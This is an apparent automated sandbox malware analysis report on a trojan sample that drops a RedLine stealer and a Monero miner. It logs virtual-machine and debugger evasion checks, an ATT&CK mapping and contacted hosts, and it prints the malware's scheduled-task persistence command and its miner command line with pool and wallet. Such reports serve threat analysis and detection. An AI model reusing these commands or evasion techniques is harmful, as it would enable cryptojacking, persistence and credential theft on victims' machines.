              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeSystem information queried: FirmwareTableInformation
              Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeRDTSC instruction interceptor: First address: 000000000176B6D7 second address: 000000000176B6E3 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, ax 0x00000005 bts edx, edx 0x00000008 xor bl, cl 0x0000000a rcl dl, cl 0x0000000c rdtsc
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 5440Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 4920Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe TID: 6660Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285098364.0000000006360000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_
              Source: RantimeBroker.exe, 0000000F.00000003.317125414.00000000015F0000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: RantimeBroker.exe, 0000000F.00000003.317400847.00000000015F0000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: RantimeBroker.exe, 0000000F.00000003.316725149.00000000015F0000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
              Source: RantimeBroker.exe, 0000000F.00000003.316864876.00000000015F0000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW0@5
              Source: RantimeBroker.exe, 0000000F.00000003.317206080.00000000015F0000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWuX
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeSystem information queried: ModuleInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information queried: ProcessInformation

              Anti Debugging:

              barindex
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeThread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeThread information set: HideFromDebugger
              Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1Windows Service1Windows Service1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection12Virtualization/Sandbox Evasion44LSASS MemorySecurity Software Discovery721Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion44SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol3Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing12Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol4Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery113Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356837 Sample: SecuriteInfo.com.Trojan.Gen... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 49 api.ip.sb 2->49 51 whois.iana.org 2->51 53 2 other IPs or domains 2->53 67 Sigma detected: Xmrig 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 10 other signatures 2->73 9 SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 15 6 2->9         started        14 RantimeBroker.exe 1 2->14         started        16 RantimeBroker.exe 2->16         started        signatures3 process4 dnsIp5 59 iplogger.org 88.99.66.31, 443, 49719, 49730 HETZNER-ASDE Germany 9->59 61 pastebin.com 104.23.99.190, 443, 49720 CLOUDFLARENETUS United States 9->61 63 blog.agencia10x.com 172.67.213.210, 443, 49721 CLOUDFLARENETUS United States 9->63 43 C:\Users\user\AppData\Local\zmql3v0y.exe, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\pg2bsuqa.exe, PE32 9->45 dropped 47 SecuriteInfo.com.T...54886.17334.exe.log, ASCII 9->47 dropped 95 Detected unpacking (changes PE section rights) 9->95 97 Query firmware table information (likely to detect VMs) 9->97 99 Hides threads from debuggers 9->99 18 zmql3v0y.exe 14 10 9->18         started        23 pg2bsuqa.exe 14 2 9->23         started        101 Multi AV Scanner detection for dropped file 14->101 103 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->103 105 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->105 file6 signatures7 process8 dnsIp9 55 195.2.84.91, 49729, 80 ZENON-ASMoscowRussiaRU Russian Federation 18->55 57 iplogger.org 18->57 35 C:\Users\user\AppData\...\RantimeBroker.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\Roaming\...\cpu.exe, PE32+ 18->37 dropped 39 C:\Users\user\AppData\...\WinRing0x64.sys, PE32+ 18->39 dropped 41 C:\Users\user\AppData\Roaming\...\config.json, ASCII 18->41 dropped 75 Multi AV Scanner detection for dropped file 18->75 77 Detected unpacking (changes PE section rights) 18->77 79 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->79 87 3 other signatures 18->87 25 cpu.exe 1 18->25         started        29 schtasks.exe 1 18->29         started        81 Query firmware table information (likely to detect VMs) 23->81 83 Machine Learning detection for dropped file 23->83 85 Tries to detect virtualization through RDTSC time measurements 23->85 file10 signatures11 process12 dnsIp13 65 pool.minexmr.com 88.99.193.240, 4444, 49731 HETZNER-ASDE Germany 25->65 89 Multi AV Scanner detection for dropped file 25->89 91 Query firmware table information (likely to detect VMs) 25->91 31 conhost.exe 25->31         started        33 conhost.exe 29->33         started        signatures14 93 Detected Stratum mining protocol 65->93 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe22%MetadefenderBrowse
              SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe29%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\pg2bsuqa.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\pg2bsuqa.exe24%MetadefenderBrowse
              C:\Users\user\AppData\Local\pg2bsuqa.exe66%ReversingLabsWin32.Trojan.AgentTesla
              C:\Users\user\AppData\Local\zmql3v0y.exe61%ReversingLabsWin32.Packed.Themida
              C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys0%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys0%ReversingLabs
              C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe16%MetadefenderBrowse
              C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe66%ReversingLabsWin64.Trojan.Miner
